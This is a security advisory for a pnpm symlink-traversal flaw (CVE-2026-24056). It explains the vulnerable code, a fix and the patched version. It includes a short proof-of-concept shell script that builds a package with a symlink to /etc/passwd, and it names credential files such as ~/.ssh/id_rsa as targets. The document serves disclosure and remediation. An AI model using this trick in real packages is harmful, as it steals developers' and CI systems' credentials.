CVE-2026-24056
pnpm has symlink traversal in file:/git dependencies
Description
### Summary

When pnpm installs a `file:` (directory) or `git:` dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`) causes pnpm to copy that file's contents into `node_modules`, leaking local data.

**Preconditions:** Only affects `file:` and `git:` dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.

### Details

The vulnerability exists in `store/cafs/src/addFilesFromDir.ts`. The code uses `fs.statSync()` and `readFileSync()`, which follow symlinks by default:

```typescript
const absolutePath = path.join(dirname, relativePath)
const stat = fs.statSync(absolutePath) // Follows symlinks!
const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET
```

There is no check that `absolutePath` resolves to a location inside the package directory.

### PoC

```bash
# Create malicious package
mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked-passwd.txt
echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json

# Victim installs
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil

# Leaked!
cat node_modules/evil/leaked-passwd.txt
```

### Impact

- Developers installing local/file dependencies
- CI/CD pipelines installing git dependencies
- Credential theft via symlinks to `~/.aws/credentials`, `~/.npmrc`, `~/.ssh/id_rsa`

### Suggested Fix

Use `lstatSync` to detect symlinks and reject those pointing outside the package root in `store/cafs/src/addFilesFromDir.ts`.
How to fix CVE-2026-24056
To remediate CVE-2026-24056, upgrade the affected package to a fixed version below.
- pnpm: upgrade to 10.28.2 or later
Is CVE-2026-24056 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- pnpm: all versions from 0 up to, but not including, 10.28.2